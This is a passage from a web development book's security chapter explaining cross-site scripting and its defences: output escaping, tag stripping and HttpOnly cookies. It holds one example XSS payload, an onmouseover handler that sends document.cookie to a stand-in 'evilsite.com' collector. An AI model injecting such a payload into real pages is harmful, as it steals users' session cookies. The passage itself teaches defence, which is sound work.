PART II
Chapter 7: Security Concerns 315
So now, you must either disallow links or try to filter out those that start with javascript.
However, anyone with a decent understanding of XHTML and JavaScript can bury script code
in just about any tag, including the harmless <b> tag, as shown here.<b onmouseover="var cookieMonster = new Image(); cookieMonster.src=
'http://www.evilsite.com/cookiecollecter.php?stolencookie=
'+escape(document.cookie);" />Hope you don’t roll over this!</a>To thoroughly address this, a variety of attributes, tags, and URL forms must be
removed. Hopefully, now everything is addressed. You can see examples to play with at the
book site that shows the insecure blog being patched in various ways. However, hackers can
be wily and come up with all sorts of modifications to their XSS attacks that may circumvent
filters that remove or replace specified tag content. A far superior way is to simply convert all
the tags posted into HTML entities. For example, < becomes < and > becomes >. This
idea is called escaping the output. You also might simply remove all the tags in a post. Many
environments provide very easy methods for performing this task. For example, in PHP you
could use the strip_tags() functions. A final blog version has been made safe from XSS-
exploits using this technique, found at http://ajaxref.com/ch7/secureblog.php. As shown in
Figure 7-10, it is clear that some have come and tried to put some scripts in place, but they
didn’t work.HTTP-Only Cookies
As previously mentioned, cross-site scripting attacks often aim to steal a cookie in an
attempt to gain unauthorized access to a site or application. XSS becomes quite a useful
technique to a hacker since JavaScript can reference cookie values via document.cookie
and a script may send the values found there using a traditional JavaScript communication
method such as the image, iframe, or <script> tag approach. However, quite often
accessing a cookie client side is not even needed, and it is quite possible to keep JavaScript
from accessing the cookie value by using an HttpOnly indication in our Set-Cookie
response header.As of the time of this edition’s writing, only Internet Explorer 6+ and Firefox 3+ support
HttpOnly cookies. You can verify the activity of your browser using the example at http://
ajaxref.com/ch7/cookie.html.